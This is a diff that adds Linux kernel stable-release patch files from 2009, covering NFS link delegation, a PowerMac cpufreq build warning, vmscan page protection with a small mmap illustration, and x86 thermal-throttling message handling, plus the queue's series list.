+ 1 file changed, 2 insertions(+)
+
+--- a/fs/nfs/dir.c
++++ b/fs/nfs/dir.c
+@@ -1536,6 +1536,8 @@ nfs_link(struct dentry *old_dentry, stru
+ old_dentry->d_parent->d_name.name, old_dentry->d_name.name,
+ dentry->d_parent->d_name.name, dentry->d_name.name);
+
++ nfs_inode_return_delegation(inode);
++
+ d_drop(dentry);
+ error = NFS_PROTO(dir)->link(inode, dir, &dentry->d_name);
+ if (error == 0) {
--- /dev/null
+From 6fdc31a2b86cf1f98e3eed896578ad9659eeb0f8 Mon Sep 17 00:00:00 2001
+From: Bastian Blank <bastian@waldi.eu.org>
+Date: Wed, 12 Aug 2009 23:30:45 +0000
+Subject: powerpc: Remove SMP warning from PowerMac cpufreq
+
+From: Bastian Blank <bastian@waldi.eu.org>
+
+commit 6fdc31a2b86cf1f98e3eed896578ad9659eeb0f8 upstream.
+
+On Thu, Aug 13, 2009 at 04:14:58PM +1000, Benjamin Herrenschmidt wrote:
+> On Tue, 2009-08-11 at 11:39 +0200, Bastian Blank wrote:
+> > This patch just disables this driver on SMP kernels, as it is obviously
+> > not supported.
+> Why not remove the #error instead ? :-) I don't think it's still
+> meaningful, especially since we use the timebase for delays nowadays
+> which doesn't depend on the CPU frequency...
+
+Your call. Take this one:
+
+The build of a PowerMac 32bit kernel currently fails with
+
+error: #warning "WARNING, CPUFREQ not recommended on SMP kernels"
+
+This patch removes the no longer applicable SMP warning from the
+PowerMac cpufreq code.
+
+Signed-off-by: Bastian Blank <waldi@debian.org>
+Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ arch/powerpc/platforms/powermac/cpufreq_32.c | 8 --------
+ 1 file changed, 8 deletions(-)
+
+--- a/arch/powerpc/platforms/powermac/cpufreq_32.c
++++ b/arch/powerpc/platforms/powermac/cpufreq_32.c
+@@ -44,14 +44,6 @@
+ */
+ #undef DEBUG_FREQ
+
+-/*
+- * There is a problem with the core cpufreq code on SMP kernels,
+- * it won't recalculate the Bogomips properly
+- */
+-#ifdef CONFIG_SMP
+-#warning "WARNING, CPUFREQ not recommended on SMP kernels"
+-#endif
+-
+ extern void low_choose_7447a_dfs(int dfs);
+ extern void low_choose_750fx_pll(int pll);
+ extern void low_sleep_handler(void);
keys-get_instantiation_keyring-should-inc-the-keyring-refcount-in-all-cases.patch
b43-fix-bugzilla-14181-and-the-bug-from-the-previous-fix.patch
pata_sc1200-fix-crash-on-boot.patch
+af_unix-fix-deadlock-on-connecting-to-shutdown-socket-cve-2009-3621.patch
+alsa-ice1724-make-call-to-set-hw-params-succeed-on-esi-juli.patch
+bonding-fix-a-race-condition-in-calls-to-slave-mii-ioctls.patch
+hwmon-it87-fix-vid-reading-on-it8718f-it8720f.patch
+netlink-fix-typo-in-initialization-cve-2009-3612.patch
+nfs-avoid-overrun-when-copying-client-ip-address-string.patch
+nfs-panic-when-commit-fails.patch
+nfsv4-fix-a-bug-when-the-server-returns-nfs4err_resource.patch
+nfsv4-fix-two-unbalanced-put_rpccred-issues.patch
+nfsv4-kill-nfs4_renewd_prepare_shutdown.patch
+nfsv4-the-link-operation-should-return-any-delegation-on-the-file.patch
+powerpc-remove-smp-warning-from-powermac-cpufreq.patch
+vmscan-limit-vm_exec-protection-to-file-pages.patch
+x86-mce-clean-up-thermal-throttling-state-tracking-code.patch
+x86-mce-fix-thermal-throttling-message-storm.patch
+iwlwifi-fix-potential-rx-buffer-loss.patch
+iwlwifi-reduce-noise-when-skb-allocation-fails.patch
--- /dev/null
+From 41e20983fe553b39bc2b00e07c7a379f0c86a4bc Mon Sep 17 00:00:00 2001
+From: Wu Fengguang <fengguang.wu@intel.com>
+Date: Mon, 26 Oct 2009 16:49:53 -0700
+Subject: vmscan: limit VM_EXEC protection to file pages
+
+From: Wu Fengguang <fengguang.wu@intel.com>
+
+commit 41e20983fe553b39bc2b00e07c7a379f0c86a4bc upstream.
+
+It is possible to have !Anon but SwapBacked pages, and some apps could
+create a huge number of such pages with MAP_SHARED|MAP_ANONYMOUS. These
+pages go into the ANON lru list, and hence shall not be protected: we only
+care about mapped executable files. Failing to do so may trigger OOM.
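+
+For illustration (not part of the change): a minimal userspace sketch
+of how an application can create a large number of such !Anon but
+SwapBacked pages; the mapping size is arbitrary:
+
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/mman.h>
+
+int main(void)
+{
+	/* Shared anonymous memory is shmem-backed: the pages are not
+	 * PageAnon but are PageSwapBacked, so they sit on the anon LRU. */
+	size_t len = 256UL << 20;	/* 256 MiB */
+	char *p = mmap(NULL, len, PROT_READ | PROT_WRITE,
+		       MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+
+	if (p == MAP_FAILED) {
+		perror("mmap");
+		return 1;
+	}
+	memset(p, 0x5a, len);	/* touch every page to allocate it */
+	pause();		/* keep the mapping alive */
+	return 0;
+}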
+
+Tested-by: Christian Borntraeger <borntraeger@de.ibm.com>
+Reviewed-by: Rik van Riel <riel@redhat.com>
+Signed-off-by: Wu Fengguang <fengguang.wu@intel.com>
+Cc: Hugh Dickins <hugh.dickins@tiscali.co.uk>
+Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
+Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ mm/vmscan.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
+@@ -1298,7 +1298,7 @@ static void shrink_active_list(unsigned
+ * IO, plus JVM can create lots of anon VM_EXEC pages,
+ * so we ignore them here.
+ */
+- if ((vm_flags & VM_EXEC) && !PageAnon(page)) {
++ if ((vm_flags & VM_EXEC) && page_is_file_cache(page)) {
+ list_add(&page->lru, &l_active);
+ continue;
+ }
--- /dev/null
+From 3967684006f30c253bc6d4a6604d1bad4a7fc672 Mon Sep 17 00:00:00 2001
+From: Ingo Molnar <mingo@elte.hu>
+Date: Tue, 22 Sep 2009 15:50:24 +0200
+Subject: x86: mce: Clean up thermal throttling state tracking code
+
+From: Ingo Molnar <mingo@elte.hu>
+
+commit 3967684006f30c253bc6d4a6604d1bad4a7fc672 upstream.
+
+Instead of a mess of three separate percpu variables, consolidate
+the state into a single structure.
+
+Also clean up therm_throt_process(): use cleaner, more
+understandable variable names and clearer logic.
+
+This, without changing the logic, makes the code more
+streamlined, more readable and smaller as well:
+
+ text data bss dec hex filename
+ 1487 169 4 1660 67c therm_throt.o.before
+ 1432 176 4 1612 64c therm_throt.o.after
+
+Cc: Hidetoshi Seto <seto.hidetoshi@jp.fujitsu.com>
+Cc: Huang Ying <ying.huang@intel.com>
+Cc: Andi Kleen <ak@linux.intel.com>
+LKML-Reference: <new-submission>
+Signed-off-by: Ingo Molnar <mingo@elte.hu>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ arch/x86/kernel/cpu/mcheck/therm_throt.c | 63 +++++++++++++++++++------------
+ 1 file changed, 39 insertions(+), 24 deletions(-)
+
+--- a/arch/x86/kernel/cpu/mcheck/therm_throt.c
++++ b/arch/x86/kernel/cpu/mcheck/therm_throt.c
+@@ -34,20 +34,30 @@
+ /* How long to wait between reporting thermal events */
+ #define CHECK_INTERVAL (300 * HZ)
+
+-static DEFINE_PER_CPU(__u64, next_check) = INITIAL_JIFFIES;
+-static DEFINE_PER_CPU(unsigned long, thermal_throttle_count);
+-static DEFINE_PER_CPU(bool, thermal_throttle_active);
++/*
++ * Current thermal throttling state:
++ */
++struct thermal_state {
++ bool is_throttled;
++
++ u64 next_check;
++ unsigned long throttle_count;
++};
++
++static DEFINE_PER_CPU(struct thermal_state, thermal_state);
+
+-static atomic_t therm_throt_en = ATOMIC_INIT(0);
++static atomic_t therm_throt_en = ATOMIC_INIT(0);
+
+ #ifdef CONFIG_SYSFS
+ #define define_therm_throt_sysdev_one_ro(_name) \
+ static SYSDEV_ATTR(_name, 0444, therm_throt_sysdev_show_##_name, NULL)
+
+ #define define_therm_throt_sysdev_show_func(name) \
+-static ssize_t therm_throt_sysdev_show_##name(struct sys_device *dev, \
+- struct sysdev_attribute *attr, \
+- char *buf) \
++ \
++static ssize_t therm_throt_sysdev_show_##name( \
++ struct sys_device *dev, \
++ struct sysdev_attribute *attr, \
++ char *buf) \
+ { \
+ unsigned int cpu = dev->id; \
+ ssize_t ret; \
+@@ -55,7 +65,7 @@ static ssize_t therm_throt_sysdev_show_#
+ preempt_disable(); /* CPU hotplug */ \
+ if (cpu_online(cpu)) \
+ ret = sprintf(buf, "%lu\n", \
+- per_cpu(thermal_throttle_##name, cpu)); \
++ per_cpu(thermal_state, cpu).name); \
+ else \
+ ret = 0; \
+ preempt_enable(); \
+@@ -63,11 +73,11 @@ static ssize_t therm_throt_sysdev_show_#
+ return ret; \
+ }
+
+-define_therm_throt_sysdev_show_func(count);
+-define_therm_throt_sysdev_one_ro(count);
++define_therm_throt_sysdev_show_func(throttle_count);
++define_therm_throt_sysdev_one_ro(throttle_count);
+
+ static struct attribute *thermal_throttle_attrs[] = {
+- &attr_count.attr,
++ &attr_throttle_count.attr,
+ NULL
+ };
+
+@@ -93,33 +103,38 @@ static struct attribute_group thermal_th
+ * 1 : Event should be logged further, and a message has been
+ * printed to the syslog.
+ */
+-static int therm_throt_process(int curr)
++static int therm_throt_process(bool is_throttled)
+ {
+- unsigned int cpu = smp_processor_id();
+- __u64 tmp_jiffs = get_jiffies_64();
+- bool was_throttled = __get_cpu_var(thermal_throttle_active);
+- bool is_throttled = __get_cpu_var(thermal_throttle_active) = curr;
++ struct thermal_state *state;
++ unsigned int this_cpu;
++ bool was_throttled;
++ u64 now;
++
++ this_cpu = smp_processor_id();
++ now = get_jiffies_64();
++ state = &per_cpu(thermal_state, this_cpu);
++
++ was_throttled = state->is_throttled;
++ state->is_throttled = is_throttled;
+
+ if (is_throttled)
+- __get_cpu_var(thermal_throttle_count)++;
++ state->throttle_count++;
+
+ if (!(was_throttled ^ is_throttled) &&
+- time_before64(tmp_jiffs, __get_cpu_var(next_check)))
++ time_before64(now, state->next_check))
+ return 0;
+
+- __get_cpu_var(next_check) = tmp_jiffs + CHECK_INTERVAL;
++ state->next_check = now + CHECK_INTERVAL;
+
+ /* if we just entered the thermal event */
+ if (is_throttled) {
+- printk(KERN_CRIT "CPU%d: Temperature above threshold, "
+- "cpu clock throttled (total events = %lu)\n",
+- cpu, __get_cpu_var(thermal_throttle_count));
++ printk(KERN_CRIT "CPU%d: Temperature above threshold, cpu clock throttled (total events = %lu)\n", this_cpu, state->throttle_count);
+
+ add_taint(TAINT_MACHINE_CHECK);
+ return 1;
+ }
+ if (was_throttled) {
+- printk(KERN_INFO "CPU%d: Temperature/speed normal\n", cpu);
++ printk(KERN_INFO "CPU%d: Temperature/speed normal\n", this_cpu);
+ return 1;
+ }
+
+@@ -213,7 +228,7 @@ static void intel_thermal_interrupt(void
+ __u64 msr_val;
+
+ rdmsrl(MSR_IA32_THERM_STATUS, msr_val);
+- if (therm_throt_process(msr_val & THERM_STATUS_PROCHOT))
++ if (therm_throt_process((msr_val & THERM_STATUS_PROCHOT) != 0))
+ mce_log_therm_throt_event(msr_val);
+ }
+
--- /dev/null
+From b417c9fd8690637f0c91479435ab3e2bf450c038 Mon Sep 17 00:00:00 2001
+From: Ingo Molnar <mingo@elte.hu>
+Date: Tue, 22 Sep 2009 15:50:24 +0200
+Subject: x86: mce: Fix thermal throttling message storm
+
+From: Ingo Molnar <mingo@elte.hu>
+
+commit b417c9fd8690637f0c91479435ab3e2bf450c038 upstream.
+
+If a system switches back and forth between hot and cold mode,
+the MCE code will print a stream of critical kernel messages.
+
+Extend the throttling code to properly notice this, by
+only printing the first hot + cold transition and omitting
+the rest up to CHECK_INTERVAL (5 minutes).
+
+This way we'll only get a single incident of:
+
+ [ 102.356584] CPU0: Temperature above threshold, cpu clock throttled (total events = 1)
+ [ 102.357000] Disabling lock debugging due to kernel taint
+ [ 102.369223] CPU0: Temperature/speed normal
+
+Every 5 minutes. The 'total events' count gives the number of cold/hot
+transitions detected, should overheating occur again after 5 minutes:
+
+[ 402.357580] CPU0: Temperature above threshold, cpu clock throttled (total events = 24891)
+[ 402.358001] CPU0: Temperature/speed normal
+[ 450.704142] Machine check events logged
+
+Cc: Hidetoshi Seto <seto.hidetoshi@jp.fujitsu.com>
+Cc: Huang Ying <ying.huang@intel.com>
+Cc: Andi Kleen <ak@linux.intel.com>
+LKML-Reference: <new-submission>
+Signed-off-by: Ingo Molnar <mingo@elte.hu>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ arch/x86/kernel/cpu/mcheck/therm_throt.c | 6 ++++--
+ 1 file changed, 4 insertions(+), 2 deletions(-)
+
+--- a/arch/x86/kernel/cpu/mcheck/therm_throt.c
++++ b/arch/x86/kernel/cpu/mcheck/therm_throt.c
+@@ -42,6 +42,7 @@ struct thermal_state {
+
+ u64 next_check;
+ unsigned long throttle_count;
++ unsigned long last_throttle_count;
+ };
+
+ static DEFINE_PER_CPU(struct thermal_state, thermal_state);
+@@ -120,11 +121,12 @@ static int therm_throt_process(bool is_t
+ if (is_throttled)
+ state->throttle_count++;
+
+- if (!(was_throttled ^ is_throttled) &&
+- time_before64(now, state->next_check))
++ if (time_before64(now, state->next_check) &&
++ state->throttle_count != state->last_throttle_count)
+ return 0;
+
+ state->next_check = now + CHECK_INTERVAL;
++ state->last_throttle_count = state->throttle_count;
+
+ /* if we just entered the thermal event */
+ if (is_throttled) {